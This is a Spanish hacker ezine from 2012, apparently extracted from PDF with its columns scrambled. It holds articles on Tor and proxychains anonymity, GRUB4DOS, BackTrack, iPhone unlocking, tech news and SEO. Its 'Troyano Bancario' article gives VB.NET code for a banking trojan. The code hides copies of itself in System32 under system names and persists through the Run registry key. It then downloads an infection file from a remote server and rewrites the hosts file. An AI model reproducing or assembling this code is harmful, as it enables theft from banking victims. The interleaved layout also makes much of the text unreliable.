You are on page 1of 43

DIRECTOR

http://dhackers.com
CONTENIDO
P.38 OBTENER CONTRASEA
PRODUCCION
www.siegroup.net

PUBLICIDAD Y DIFUSION DE FACEBOOK


www.turundus.net
ARTE Y DISEO
Josue Juarez Quezada
P.14 Noticias del Primer Semestre del 2012
P.42 Fotomontaje
P. 4 10 Pautas de Seguridad
P.30 Entrando a un equipo con Armitage
P.24 Fail2Ban
P.18 Instalando BackTrack 5 r2
P.32 Trucos Windows 7
P.34 Conociendo mi PC
COLABORADORES P.10 Liberar iPhone 3G/3GS sin WiFi Baseband 6:15
Noely P.28 Procedimiento de Desbloqueo de Celulares.
noe_c20@hotmail.com
P. 8 Troyano Bancario en Visual Studio .NET
m3x1c0h4ck
designbyjos@hotmail.com
P.20 SEO Google
P. 5 Privacidad en Internet Proxy TOR
SeNeGe
senege@gmail.com P.16 Ejemplos de Inicio de Grub4dos
arthusu
P.40 Levantando el Hyper Linux Parte 1
arthusuarthusu@gmail.com

locutus
|_ocutuslocutus@elhacker.org

IPepe
iipepe@gmail.com

nomo11
aldolopez_11@hotmail.com

RandomSoft
random.soft@hotmail.com

eb4bgr

Angel cantu
jauregui angel.cantu@siegroup.net
LA MEJOR COMUNIDAD DE HACKERS EN LATINOAMERICA

http://foro.dhackers.com/
10 Pautas de Seguridad
D aremos las recomendaciones mas fciles e imprescindibles para tener una seguridad fiel y que
nuestro OS no se convierta en una maquina llena de virus y moustros que terminen con el sistema.

1 Tener siempre instalada una suite de


seguridad o programas que estn separados
que incluyan antivirus, firewall y detencin de
malware y en el correo y siempre verificar que
estn actualizados correctamente.

2 Nunca divulgar nuestra direccin de correo electrnico, si no son personas confiables, pasa
en muchos casos que las personas se pasan mostrando y dando a conocer su direccin por
internet y paginas de ocio a si como de redes sociales sin saber el peligro que esto causa, antes
primero saber que que el sitio en comn es seguro. Tambin es importante tener muchas
cuentas alternativas (con diferentes contraseas) y a si no tener que mantener mucho spam en
una sola cuenta y hacer un backup en cada cuenta por si a caso.

3 Nunca abrir un archivo adjunto sin antes pasarle el antivirus, unas de las recomendaciones
que doy es que es importante si en el momento no tienes antivirus que no es recomendable,
ver la extencion de la misma, recordemos que la mayora de los virus tienen extencion exe
pero pueden estar camuflados por otra extencion engaosa.

4 Siempre tener en cuenta a quien agregamos o aceptamos en nuestra cuenta de mail, ya que
a veces son intrusos que quieren que revelemos nuestra identidad a si como privacidad, un
ejemplo son personas que siempre estan permanentemente preguntando cosas en comn y
nunca dejan que vos pregunte de la misma a si como intentan hacer una confianza lo mas
rpido posible y lo logran, (a eso se llama Ing Social).

5 Nunca seguir enlaces de correos electrnicos que vienen de un mail, preferible copiar la
direccin y ponerla en el navegador a si podrs tener mas control de ella.

6 Siempre tener en cuenta y seguridad a donde vamos a enviar nuestras fotos o


archivos por medio de seguridad ya que esos archivos pueden revelar nuestra
identidad y privacidad de la misma.

7 Nunca reponder correo basura a si llamado spam.

8 Pasa usar un buen navegador pero tenemos muchas


alternativas como Intenret explorer, Opera, Firefox, Chrome
etc (recomendado Opera) y siempre ver tener activado No
Script Como lo tiene Firefox.

4 SeNeGe
Privacidad en Internet TOR
en este caso no es "salir" a internet
s i estas leyendo esto es por que
estas preocupado por cuidar tu
servidores proxy sino usar el "puente" para esconder
nuestra direccion IP original.
privacidad mientras navegas (o haces
difundido y comun para ocultar nuestra
cosas q no deberias), en cualquiera haciendo una rapida busqueda en
direccion IP son los proxies. un proxy
de los casos es una sana google pueden encontrarse muchas
preocupacion ya q cada vez es un proxy es un servidor es un servidor que listas de proxies. si bien en teoria todo
mayor la cantidad de datos q que cumple la funcion de cumple la funcion funciona como explique antes, los
dejamos por ahi y las ganas de intermediario en una de intermediario proxies tambien guardan logs y ante
en una conexion,
los gobiernos y grandes conexion. una orden judicial la mayoria de estos
por ejemplo en
corporaciones de ponerles las manos los entregan a las autoridades
una empresa el proxy es la maquina
encima para cruzarlos con los suyos correspondientes. una solucion usada
que da acceso a internet a las de la red
propios con oscuros propositos... durante muchos aos es "encadenar"
interna. desde ahi podemos controlar
proxies, haciendo q la peticion pase x
trafico, aplicar permisos a los clientes y
en espaa por ejemplo ya se aprobo varios de ellos antes de llegar a
muchas otras cosas, pero lo importante
la ley SINDE, entre cuyas atribuciones destino. esto no hace imposible seguir
para lo que estamos viendo es la
esta la de cortar el acceso a internet a el rastro de los paquetes pero si lo
funcion de hacer de "puente" hacia
los users q violen derechos de autor. hace mas dificil al tener que conseguir
afuera.
mas alla de la ridiculez de la medida y analizar logs de varios lugares,
supongamos q queremos abrir
contra el usuario final que baja un dependiendo de leyes locales y otros
xxxx.com. la pc de la red interna hace
mp3, tengan en cuenta que hay toda factores en todo caso es la solucion
la peticion al proxy y este a su vez la
una organizacion que checkea logs, de anonimato mas rapida ya que se
hace a xxxx.com
pide mas logs y va a puede configurar practicamente en
despues de
buscar gente a la cualquier navegador y sistema
analizarla y
casa para cortarle la (incluyendo moviles) rapidamente y
checkear en sus
conexion a internet. sin tener q instalar absolutamente
reglas si la procesa
ellos saben todo lo nada. solo una lista de proxies q
o no. "xxxx", como
que estas haciendo funcionen...
cualquier web
te guste o no,
server, guarda logs
cuando piden esos
de las IPs que lo
TOR
registros ahi no esta TOR fue originalmente diseado para
visitan, en este
solo el link del mp3 sino encriptar comunicaciones
caso la IP que queda en el log es la del
completamente todo lo q navegaste o gubernamentales de la "us navy". es
proxy y no la de la maquina interna que
hiciste. una red formada x nodos a traves de
ni siquiera posee conexion directa
los cuales viaja nuestra informacion x
hacia afuera. de esta forma cualquiera
obviamente en todos lados se rutas aleatorias. esta ruta, ademas de
que sea la pc en la red interna que
guardan logs pero afortunadamente la info q viaja a traves de ella, esta
haga una peticion a xxxx siempre va a
en la mayoria de los paises se encriptada y cada uno de los relays en
quedar en sus logs la IP del proxy.
necesita de una orden judicial y una la red solo sabe
buena razon para obtenerlos y cuando TOR fue originalmente de cual viene la
solo tenemos que pasar esto
digo "buena razon" no me refiero a diseado para encriptar info y a cual va,
a nivel de internet y vemos
alguien bajando musica o un capitulo comunicaciones no conoce el
claramente lo q hace un
de "walking dead". destino final ni el
proxy. la peticion sale de la
origen. la idea es crear un ruteo
pc hacia nuestro ISP (Internet Service
pero dejemos de divagar y vamos al complicado, cambiarlo cada 10
Provider), va hacia el proxy y el la hace
tema... minutos y no mantener logs.
devolviendonos el resultado. la finalidad

5 |_ocutus
el sistema parece perfecto... y es bastante interfaz web. tiene infinidad de para el uso normal asi q ya esta
bueno, pero esta lejos de proteger 100% opciones... es cosa de darle un rato corriendo y escuchando
nuestra privacidad. los sitios web toman pero con la configuracion casi x default conexiones en el puerto 9050.
bastante mas info como el tipo de browser, sale andando. al final instalamos y como prueba pueden agregar en
sistema, resolucion de pantalla, referals, etc, configuramos todo... ) el navegador los datos de proxy
etc, etc. socks como localhost en ese
proxychains puerto y ya deberia estar
ademas de esto, x la estructura de la red tor funcionando. en firefox vamos a:
es posible sniffar datos en texto plano con el problema viene muchas veces edit > preferences > advanced > network
bastante facilidad. no voy a explicar en cuando queremos anonimizar una
detalle como xq se extiende mucho el tema conexion de consola. en un browser es en "connections" hacemos click
pero la vulnerabilidad se basa en el ultimo facil de configurar y aunque en linux se en "settings" y completamos los
tramo de la ruta, del ultimo nodo al server de le puede poner proxy casi a todo, campos:
destino, donde la informacion viaja sin siempre hay algo q falta o no es
encriptacion alguna. solamente hay q setear comodo andar editando archivos de
tor como "exit node" para ser ese ultimo configuracion todo el tiempo para
eslabon y ponernos a sniffar todo el trafico q usarlos solo un rato. con proxychains
pasa x el... no solo podemos pasar cualquier
cosa a traves de un proxy sino q
PRIVOXY facilmente podemos crear cadenas
como las q hablabamos al principio o
en la mayoria de los tutoriales de instalacion simplemente redirigirlo a tor.
de TOR se incluye PRIVOXY. esto se debe
a q con este ultimo podemos ocultar mucha en caso de usar propios las listas
de la informacion que entregan nuestras pueden encadenarse de 3 tipos
aplicaciones cuando se conectan a internet distintos. aleatorio, orden exacto o el siguiente paso es configurar
pero tambien a q en firefox hay un problema dinamico q es capaz de identificar y privoxy. nos vamos a
con el soporte para socks (q usa tor) q sacar de la cadena proxies muertos. /etc/privoxy/ y editamos el
genera timeouts, lo cual resulta en paginas archivo "config", al final
q no cargan aleatoriamente y ese tipo de puede usarse practicamente con agregamos la linea:
problemas. simplemente firefox a veces no cualquier aplicacion de consola, nmap,
espera q se complete el circuito en la red y... ssh, wget... o lanzar aplicaciones forwardsocks4a / localhost:9050 .
timeout! graficas, simplemente: (con el punto al final incluido)

otro serio problema con tor son los "DNS # proxychains ssh root@..... con esto lo q hacemos es redirigir el
leaks" o fugas dns. antes de enviar los datos # proxychains nmap sT ..... trafico de privoxy a tor. privoxy
se hace una peticion normal a un server # proxychains pidgin corre en el puerto 8118, de manera q
DNS para resolver el nombre para recien con esos datos configuramos ahora
entonces encriptarlos y enviarlos. el trafico Instalando y el navegador pero en lugar de "socks
sigue estando a salvo pero no la actividad q configurando todo host" usamos "http proxy" y
es facilmente rastreable. esto se soluciona la explicacion va para debian y sus checkemos "use this proxy server for
usando privoxy que justamente evita los dns derivados, obviamente sirve perfecto para all protocols".
leaks. la idea entonces es instalar privoxy, q ubuntu q es lo q usa la mayoria (yo sigo
este "limpie" todos estos datos segun el prefiriendo el original... je). empezamos x para configuracion mas fina se
nivel en q se lo pidamos y le pase la peticion descargar e instalar las 3 aplicaciones q se puede usar la interfaz web a la q se
a tor. este crea el circuito, la envia y encuentran en los repositorios: accede x medio de la url:
despues de atravesarlo llega a destino. # aptget install tor privoxy proxychains
(con sudo en ubuntu) http://config.privoxy.org/
la aplicacion se puede configurar con un
simple editor de texto o desde una intuitiva Tor no necesita mayor configuracion de ahi vamos a:

6
"View & change the current configuration"
(http://config.privoxy.org/showstatus) y
podemos modificar muchisimas opciones,
desde cambiar el useragent hasta sacar
las animaciones a los GIFs.

otra opcion interesante es hacer q privoxy


escuche conexiones de toda la lan,
pudiendo asi tener una sola maquina
corriendo tor y privoxy para usarla desde
cualquiera en la red. para eso agregamos
al final la linea:

listenaddress x.x.x.x:8118

donde x.x.x.x es la ip de la pc local q esta


corriendo privoxy. despues de esto se
puede configurar como proxy en cualquier
pc conectada a la lan.

finalmente nos queda proxychains para


usar aplicaciones de consola. vamos a
/etc/ y editamos "proxychains.conf". al final
agregamos (o descomentamos):

socks4 127.0.0.1 9050

enviando el trafico a tor. por las dudas


asegurense de q strict_chain y proxy_dns
esten descomentados. si quieren poner
una lista de proxies este tambien es el
lugar en el formato q esta arriba.

epilogo...
todo esto sirve para tener un anonimato
aceptable pero tampoco significa q seamos
"inrastreables" ni mucho menos ante una
investigacion "seria". para ser
completamente anonimos en una accion
puntual lo mejor es usar un sistema
operativo en un CD/DVD booteable y
conectarse a una red publica bien lejos de
cualquier lugar q pueda relacionarse con la
persona q la realiza.

si vas a hacer algo en algun punto "ilegal",


no te sientas intocable x usar tor... si vas a
hacer algo ilegal... mejor no lo hagas. )

7
Troyano Bancario (Parte I)

S aludos queridos amigos, en esta oportunidad


os enseare a crear un pequeo troyano bancario,
En conclusin tendremos una
condicin como esta:
nuestro registro, C:\directorio donde
haremos que se almacene el troyano)
Public Sub AutoCopy() Catch ex As Exception
para eso tenemos que tener el programa: Visual End Try
If
Studio .Net 2010 Professional (de preferencia). Return True
File.Exists(C:\Windows\System32\winl
ogon.exe) Then End Function
Bueno ir al grano, luego determinaremos las
File.Copy(Application.ExecutablePath.T
funciones que tendr nuestro troyano.
oString, 3. Verificacin de Internet:
C:\Windows\System32\windrivers.exe
Funciones: En esta funcin lo que haremos ser
, True)
File.SetAttributes(C:\Windows\System verificar si el ordenador donde se
1. AUTOCOPIA Y OCULTACIN. encuentra nuestro troyano dispone de
32\windrivers.exe,
2. AUTOARRANQUE. internet y as de esa manera poder
FileAttribute.Hidden)
3. VERIFICACIN DE INTERNET. habilitar algunas funciones y evitar que
Else
4. DESCARGA DE ARCHIVO. se ejecuten en vano en caso de no
File.Copy(Application.ExecutablePath.T
5. INFECCIN DEL HOSTS. disponer con internet, para eso
oString,
6. REPETIR T.A. utilizaremos esta sentencia de cdigos:
C:\Windows\System32\winlogon.exe,
True) Public Function VerifyInternet() As
Despus de tener bien claras nuestras funciones, Boolean
File.SetAttributes(C:\Windows\System
podemos empezar a crear nuestro troyano Try
32\winlogon.exe, FileAttribute.Hidden)
bancario, si lo queris hacer ms formal, entonces If
End If
empiecen a crear sus FlujoGramas, My.Computer.Network.IsAvailable =
End Sub
Pseudocdigos y todo ese rollo que uno tiene que True Then
hacer al crear un Software, pero como no estamos Return True
2. Autoarranque:
para perder el tiempo, iremos directo al grano, Else
Esto nos ayudar a ejecutar
claro que al hacer todo ese rollo nos facilitar Return False
automticamente nuestro troyano cada vez
hacer la programacin ms completa y ordenada, End If
que inicie el sistema operativo, para eso
pero al diablo con eso. Catch ex As Exception
tenemos que conocer el registro de
Windows y crear un registro en el Return False
1. Autocopia y Ocultacin: directorio de arranque de la ubicacin End Try
Para continuar con este procedimiento tenemos End Function
donde se encuentra almacenada nuestro
primero que verificar si el troyano se encuentra
troyano y ponerle un nombre, ante todo
almacenada en la computadora, para eso
declaramos la variable: 4. Descarga de Archivo:
utilizaremos el cdigo:

Dim Calculate As RegistryKey Ahora procederemos a descargar


File.Exists(C:\directorio donde haremos que nuestro archivo de infeccin para el
Private Function AutoArranque() As
se almacene el troyano) hosts, utilizamos este pequeo
Boolean
Luego de eso podremos usar el cdigo de cdigo:
ListRun =
copiar:
"SOFTWARE\Microsoft\Windows\Current
File.Copy(Application.ExecutablePath.ToStri My.Computer.Network.DownloadF
Version\Run"
ng, C:\directorio donde haremos que se ile(URL de nuestro archivo de
Registry.CurrentUser.DeleteSubKeyTree(L
almacene el troyano, True) infeccin, C:\directorio donde se
istRun)
Y no os olvidis del atributo de Ocultacin, almacenar la descarga)
Try
para eso utilizaremos este cdigo:
Calculate =
File.SetAttributes(C:\directorio donde Pero antes de iniciar la descarga de
Registry.CurrentUser.CreateSubKey(ListR
haremos que se almacene el troyano, nuestro archivo tenemos que
un)
FileAttribute.Hidden) verificar si la URL se encuentra
Calculate.SetValue(Nombre de

8 RandomSoft
disponible, para eso tenemos que Bueno amigos eso es todo por el
Dim ColumnValue, CountPerformance As
declarar las variables de esta forma: momento, por motivos de seguridad
String
no coloco el script completo o el
Dim PositionValue As WebRequest resultado final, esta EZine DHackers
El cdigo que nos servir para leer el
Dim ResponseHtml As es para un fin educativo, el grupo
contenido de nuestro archive es este:
HttpWebResponse DHackers y mi persona no nos
ColumnValue =
Dim Declared As String hacemos responsables del mal uso de
File.ReadAllText(C:\directorio del archive
esta revista, para cualquier dudo o
a leer el contenido)
Public Function Verify_URL(ByVal para mayor informacin no duden en
Y el que nos permitir reinscribir el
URL_Only As String) As String contactarme.
contenido de nuestro archivo es este otro:
Try
File.WriteAllText(C:\directorio del
PositionValue = Saludos de RandomSoft.
archive que reinscribiremos, Aqu el
WebRequest.Create(URL_Only)
contenido que escribiremos)
ResponseHtml =
Public Function Infecion() As String
CType(PositionValue.GetResponse(),
On Error Resume Next
HttpWebResponse)
ColumnValue =
Declared =
File.ReadAllText(C:\cuentas.txt)
ResponseHtml.StatusDescription()
CountPerformance = Para que un programa sea un
Catch ex As WebException
ColumnValue.ToString() troyano slo tiene que acceder y
End Try
controlar la mquina anfitriona sin ser
Return Declared
If CountPerformance <> "" Then advertido.
End Function
File.WriteAllText(C:\directorio del
archive a reinscribir, Hola Mundo by
Despus haremos una condicin para
RandomSoft)
proceder con la descarga
End If
End Function
Public Sub CopyrightInf()
If VerifyInternet() = True Then
If
6. Repetir T.A:
Verify_URL(http://www.miservidor.c
En esta funcin necesitaremos de un
om/infeccion.mp3) = ConditionValue
Timer para repetir las dems funciones
Then
que anteriormente hicimos, ante todo
My.Computer.Network.DownloadFile(
declararemos las variables.
http://www.miservidor.com/infeccion.
mp3,C:\Windows\System32\wieurkd
Dim d As Integer
n.dll)
Private Sub Timer1_Tick(ByVal sender
End If
As System.Object, ByVal e As
End If
System.EventArgs) Handles
End Sub
Timer1.Tick
d=d+1
5. Infeccin del Hosts:
If (d = 500) Then
Try
Aqu lo nico que haremos ser leer el
AutoArranque()
contenido del archivo que descargamos y
d=0
luego reinscribir el contenido de nuestro
Catch ex As Exception
archivo hosts, para eso declaramos una
End Try
varible de tipo string el cual contendr la
End If
informacin:
End Sub

9
Liberar iphone 3G/3GS sin wi-fi base band 6.15

E sta vez les traigo un tutorial de como liberar nuestro iphone sin wifi
Muchos sabrn que los iphone se liberan por el wifi...

Esta vez utilic un 3GS con la versin 5.0.1 que es la ltima versin
(En algunos casos no se pudo liberar con dicha versin, a si que, si no

Ultrasn0w 1 .2: http://www.mediafire.com/?plo7alk33tn2soc


Ifunbox: http://dl.ifunbox.com/ifunbox_en.zip

les funciona tendrn que hacerle downgrade)

Necesitamos los siguientes archivos a descargar.Tener nuestro iphone


previamente hecho Jailbreak ya que los archivos se instalan en Cydia.
Y por supuesto con base band 6.15

Abrimos el Ifunbox con nuestro iphone conectado.


Casi no hay explicacin ya que las imgenes hablan
por s solas

10 nomo11
11
En la carpeta "AutoInstall"
arrastramos los archivos que
descargaron Ultrasn0w son
2 archivos, los arrastramos a
la carpeta.

12
Nota: Si alguna carpeta no aparece en su iphone, hganla
ustedes mismo tal y cual como muestra las imgenes, con
maysculas y minsculas, ya que si no lo hacen a s, no
lo reconocer su iphone.

13
ENERO
Noticias

Notic
Megaupload y megavideo dicen adis, El FBI
cierra el mayor sitio de intercambios
El departamento de Estado de EE.UU. , el FB I
y otras autoridades internacionales decidieron
clausurar Megaupload y detener a sus
responsables , acusados de conspiracin para
cometer un crimen organizado , lavado de
dinero , infracciones de derechos de autor de
forma masiva y violacin de la propiedad
FEBRERO
MySpace volvi y ya tiene nuevos usuarios
El retorno de MySpace ( en el 2005 y 2008 haba sido el sitio
ms visitado) haba perdido a sus usuarios debido al gran boom
de Facebook y otras redes sociales .
En el 2012 luego de un cambio de dueos y
estrategias , gracias a la frase si no puedes con tus
enemigos nete a ellos , hizo que cada da se abran
40 mil nuevas cuentas . Aprovecharon las 42
millones de canciones de las que dispone la red
intelectual , lo cuales podran enfrentar una social , la convirtieron en un nodo de msica y
cadena de hasta 50 aos de prisin. entretenimiento para compartir en Facebook y
Esta operacin fue dirigido en contra de Twitter.
Megaupload (por intercambio de archivos) y Sony Ericsson ahora se llama
Megavideo (visualizacin de videos en internet) Sony Mobile Communications
. Ambas son propietarias de la misma La compra de Sony haba sido anunciada en
compaa. octubre del 2010 pero recin este ao se hizo
El departamento de Justicia acusa a sus efectiva la compra.
responsables de la piratera masiva en todo el http://www.infobae.com/adjuntos/jpg/2011/11/60
mundo de diferentes obras protegidas por 0x0_484482.jpg
derechos de propiedad intelectual Sony Mobile Communications integrar el
segmento de celulares como un elemento vital de
su negocio de la electrnica.

MARZO
El debut en Espaa de la ley Sinde
A partir de esta normativa se cre una comisin gubernamental que ser el ente regulador encargado de evitar las descargas ilegales y
adems tienen autorizacin a cortar el acceso de la web a los usuarios que violen los derechos de propiedad intelectual.
http://www.infobae.com/adjuntos/jpg/2011/01/600x0_336614.jpg
Esta norma fue aprobada en el Congreso de Espaa en el ao 2011y conto con el apoyo de entidades de gestin de derechos de autor y la
industria audiovisual.
Paypal present un nuevo dispositivo de pagos va celular
Paypal presento un dispositivo que ayuda a las empresas a aceptar tarjetas de crdito y de dbito.
http://www.infobae.com/adjuntos/jpg/2012/03/600x0_520529.jpg
Paypal Here es una aplicacin mvil que se instala en celulares , por el momento solo funciona con el iPhone. Ms adelante servir a los
equipos con Android de Google.
Este sistema permite a los comercios a aceptar pagos mediante dispositivos porttiles.

14 Noely
cias
ABRIL
Firefox presento su nueva versin "Firefox
12"
Mozilla presento su nueva versin para
Windows , Mac y Linux.En l se destaca la
actualizacin del navegador , que se hace
de manera ms rpida y sencilla y mejoras
en las prestaciones para los desarrolladores
(medios de control para la reproduccin de
MAYO
Primer semestre del ao

Celebracin del da de Internet


Las Naciones Unidas decidieron designar como
el 17 de Mayo como el Da Mundial de las
Telecomunicaciones y de la Sociedad de la
Informacin.
Este da servir para dar a conocer mejor la
importancia que tiene este recurso mundial ,
surge de la sociedad , por la sociedad y para la
videos HTML 5 y JavaScript). sociedad .
http://www.infobae.com/adjuntos/jpg/2012/ http://www.youtube.com/watch?v=i4RE6dBAjH
04/600x0_532059.jpg 4&feature=player_embedded
Pinterest, la red social que consigui el
tercer puesto de popularidad en EE.UU.
Esta red social que permite compartir y
recomendar imgenes entre usuarios
creando un portafolio temtico , aumento en
JUNIO
enero y febrero con un 50 % de visitas de Twitter presento su nuevo logo
EE.UU. , posicionndose en el tercer puesto Ahora se la identificara solo con el pajarito
de las ms populares (Facebook en el azul , este logo surgi de un amor por la
primer puesto y segundo Twitter) .Este ornitologa y el diseo simple y efectivo.
aumento de visitas fue gracias a una
recomendacin de la revista Time.
http://www.infobae.com/adjuntos/jpg/2012/06/

http://www.infobae.com/adjuntos/gif/2012/
600x0_548255.jpg

02/600x0_511141.gif
Este nuevo logo sugiere el buen momento
que atraviesa Twitter y el exitoso futuro que
le aguarda.

15
Ejemplos de inicio con GRUB4DOS
Seguro que muchos de vosotros os independientemente del que sea: ejemplo en concreto es para Ubuntu
habris preguntado ms de una vez Linux:
cmo iniciar varios Sistemas title Boot from HardDrive\n
Operativos desde un mismo dispositivo rootnoverify (hd0,0) title Ubuntu 12.04 Linux
USB, o desde el propio CD/DVD. Hay chainloader (hd0,0)+1 LiveCD\n
varias herramientas que facilitan esta boot find setroot ignore
tarea, pero con un poco de tiempo floppies /mypath/ubuntu
podris conocer una de las mejores, Ahora vamos a indicarle que cargue en 12.04desktopi386.iso
GRUB4DOS. la memoria R.A.M. la imagen .Iso de un map /mypath/ubuntu12.04
LiveCD y que la inicie. Esto es til si desktopi386.iso (0xff)
En este artculo os quiero mostrar no tenemos unidad de CD/DVD en map hook
varios ejemplos de lo que podis hacer nuestro PC, pero tenemos que tener root (0xff)
con este magnfico BootLoader. Todos memoria R.A.M. suficiente para cargar kernel /casper/vmlinuz
los ejemplos son reales y funcionan la imagen y para iniciar el Sistema boot=casper BOOT=casper iso
con GRUB4DOS 0.45 editando el Operativo que tenga el CD/DVD. scan/filename=/mypath/ubuntu
archivo menu.lst nicamente hay un tipo de inicio que 12.04desktopi386.iso
GRUB4DOS no nos permite hacer, y es persistent rw splash vga=791
Empezaremos con algo sencillo, cmo iniciar una imagen .Iso si el dispositivo max_loop=255
cargar la imagen de un Floppy Disk de de inicio es el propio CD/DVD. Para initrd /casper/initrd.lz
inicio. Para hacer esto se soportan los poder usar este mtodo, el archivo .Iso boot
formatos .Img y .Gz por lo que el que contenga la imagen de nuestro
archivo de la imagen de vuestro CD/DVD tiene que estar Ahora vamos a iniciar un PC que
disquette puede estar comprimido y desfragmentado. Ms informacin en tenga instalado Windows Xp en el HD,
ocupar menos espacio: www.boot usando el mtodo ms fcil.
land.net/forums/index.php?showtopic= GRUB4DOS soporta varios tipos del
title Windows 98 Floppy 8797 / www.boot Sistema de Archivos, incluyendo
Disk\n land.net/forums/index.php?showtopic= FAT32, NTFS y NTFS comprimido:
find setroot 5041&st=20
/mypath/win98dos.gz title MicroSoft Windows Xp\n
kernel /mypath/memdisk title My .Iso Image in rootnoverify (hd0,1)
initrd /mypath/win98dos.gz R.A.M.\n chainloader (hd0,1)+1
boot find setroot ignore find setroot ignore
floppies floppies ignorecd /NtLdr
Ahora haremos una pequea variante /mypath/myisoimage.iso chainloader /NtLdr
para iniciar Windows 9x, esta vez map /mypath/myisoimage.iso boot
desde el HD: (0xff) || map mem
/mypath/myisoimage.iso Y el mismo inicio usando un mtodo
title Windows 9x\n (0xff) alternativo:
find setroot ignore map hook
floppies /Io.Sys chainloader (0xff)
chainloader /Io.Sys boot title MicroSoft Windows Xp\n
boot find setroot ignore
Y aqu una pequea variante si nuestro floppies ignorecd /NtLdr
Tambin podemos indicarle que inicie PC no tiene suficiente memoria R.A.M. map () (hd0)
el PC desde el Sistema Operativo que y queremos iniciar la imagen .Iso desde map (hd0) ()
haya en nuestro HD, el archivo que la contiene. Este map rehook

16 eb4bgr
find setroot ignore
Para instalar el cargador de
floppies ignorecd /NtLdr
GRUB4DOS en el sector MBR podis
chainloader /NtLdr
utilizar las herramientas que vienen
boot
con el programa. Lo ms sencillo es
iniciar nuestro PC con la herramienta
Vamos a usar el mismo mtodo para
Hiren's BootCD
iniciar Windows Vista/Seven:
(http://www.hirensbootcd.org/downlo
ad), y desde el men de herramientas
title MicroSoft Windows
de HBCD seleccionar el programa
Vista/Seven\n
Grub4Dos Installer. Despus de esto,
find setroot ignore
seleccionais la unidad USB en la que
floppies ignorecd /bootmgr
queris poner el cargador de
map () (hd0)
GRUB4DOS (tambin podeis hacerlo
map (hd0) ()
en el HD) y pulsais en el botn
map rehook
"Install". Despus hay que copiar el
find setroot ignore
archivo GrLdr al directorio raz de la
floppies ignorecd /bootmgr
particin donde habeis modificado el
chainloader /bootmgr
sector MBR con el cargador de
boot
GRUB4DOS, y que esa particin est
marcada como activa para iniciarse.
AVISO IMPORTANTE: Si instalas
Tambin podemos indicarle que inicie
Ubuntu Linux en una particin de
GRUB4DOS en la misma particin del
nuestro HD. Antes de hacer esto hay
HD donde tengas instalado Windows
que entrar en la Lnea de Comandos de
Vista/Seven, te elimina la informacin
GRUB4DOS y ejecutar la orden "UUID",
de licencia de Windows y tu copia
que es la que nos muestra los
aparecer como no registrada. Este
identificadores de las particiones:
hecho no se produce si instalas
Ubuntu Linux en un PC con Windows
title Ubuntu 11.04 Linux\n
Vista/Seven. Ubuntu Linux utiliza
uuid 071e0978fb774d32934e
GRUB, el proyecto original. Tened
7117f617ac4a
cuidado.
kernel /vmlinuz
Como habis podido ver, este
root=UUID=071e0978fb774d32
excelente BootLoader nos permite
934e7117f617ac4a ro splash
hacer prcticamente todo lo que
vga=791 max_loop=255
deseamos. Espero que este artculo
initrd /initrd.img
os haya resultado til.
boot
http://grub4dos.sourceforge.net

Alejandro Padrino.
Para finalizar, os muestro unas pocas
cosas ms que se pueden hacer con
GRUB4DOS.

Lnea de comandos de
GRUB4DOS:

title Grub4Dos CommandLine\n


commandline
Reiniciar el PC:
title ReBoot Computer\n
reboot

17
Instalando el sistema operativo backtrack 5 r2
Bienvenidos a la ezine dhackers
bueno en este articulo les enseare a
instalar este increble sistema operativo
llamado backtrack 5 r2

Ah es la opcin para iniciar podemos


iniciar de diferentes maneras backtrack
nosotros usaremos la primera Defaul
aunque puedes usar sin red, sin driver y
memoria de intercambio, modo seguro,
memstest(para comprobar tu memoria ram)
y bootear desde el disco duro :P
Ahi es la opcion para iniciar
podemos iniciar de diferentes
maneras backtrack nosotros
usaremos la primera Default aunque
puedes usar sin red, sin driver y
memoria de intercambio, modo
seguro, memstest(para comprobar tu
memoria ram) y bootear desde el
disco duro:

Nos saldr la siguiente pantalla ah le


ponemos:
Startx
Para iniciar el modo grafico

18 arthusu
Configuracion del
teclado

Otro paso muy importante es que podemos instalar backtrack


como una particin de disco duro y usar dos sistemas
operativos a la ves, pero para no enrollarnos lo instalamos en
todo el disco duro y a probar.

Le damos Borrar y usar el disco entero y Adelante

Ya solo hay que esperar a que se llene al 100%


la instalacin

Por ultimo backtrack nos avienta un login, para


ello los datos por defecto son:
Bt login: root
Password: toor
Y listo solo inicias el modo grafico con Startx
ahora si a probar backtrack

19
SEO
Hola bueno, antes de que empiecen a leer este "manual" quiero dar google que localiza una pagina, se guarda la informaci?n sobre la
mi opinion de que lo que esta puesto aca no esta actualizado y eso misma, la analiza, la pasa a un editor, y a esa pagina se le da una nota.
quiere decir que google no siempre usa las mismas tcnicas de
bsquedas y de mediciones para la info, tambin quiero decir que a Una nota entre el 1 y el 10. A esa nota se le conoce como PageRank.de
pesar de hacer todo lo que dice eso no va a decir que vamos a estar 2/10
primeros ya que es todo relativo, y la mejor forma de durar es con
el tiempo, osea mientras mas ?Como puedes saber el PageRank de las p?ginas que visitas?
tiempo en la red mas te tendran
cuenta. F?cil, con una herramienta, la Googlebar. Descargal? e instalal?:

Manual para mejorar tu Aqui teneis el enlace ara los que usan Explorer y para los que usan un
posicionamiento en Google. navegador de verdad, Modzilla. Con la googlebar, podremos no solo
(Rollo Barrio Sesamo), saber cual es el page rank de una p?gina, si no que incluso podremos
Google es el "pupo buscador" "VOTAR" a esa p?gina para que google tenga una referencia de
por excelencia. De hecho hay nuestros gustos. Adem?s incluye otras interesantes opciones que ya
buscadores y luego hay Google, ir?is descubriendo.
y punto.
?Me hablas un poco m?s del Page Rank?
Hacer que tu pagina aparezca en Google es m?s que sencillo, de
hecho basta con que alguien que ya este indexado en su base de Pues para que os hag?is una idea:
datos, haga un link desde su pagina a la tuya, y Google te Una pagina Web que tiene un page rank 5/10 o 6/10 es una p?gina
encontrar?. (Google siempre te encuentra por que google manda) importante, ?sea, que cualquier palabra que se escriba en esa Web, es
Tambien puedes sugerirle que lea tu pagina desde aqu? una palabra que aparecer? casi siempre, en los primeros resultados de
google: Consecuencia> mogoll?n de visitas.
Ahora, la gracia est? en estar bien posicionado, ?sea, aparecer en
las primeras posiciones de b?squeda. Por que esta muy bien eso de ?Por qu? es interesante recibir visitas a tu p?gina desde google?
decir: Eh, Eh, que aparezco en google. Cuando sales en la pagina
33. En primer lugar por que mola :) . Y en segundo, por que eso quiere
decir que llegara gente que se interesa por lo que escribes.
?Como funciona Google?, ?Que es el posicionamiento?
Pues a ver. Si tienes un page rank 2/10 o 3/10... La verdad, es que de
Google usa un algorritmo (No, eso no se baila) de b?squeda google te van a venir pocas cosas. Lo suyo es tener como m?nimo
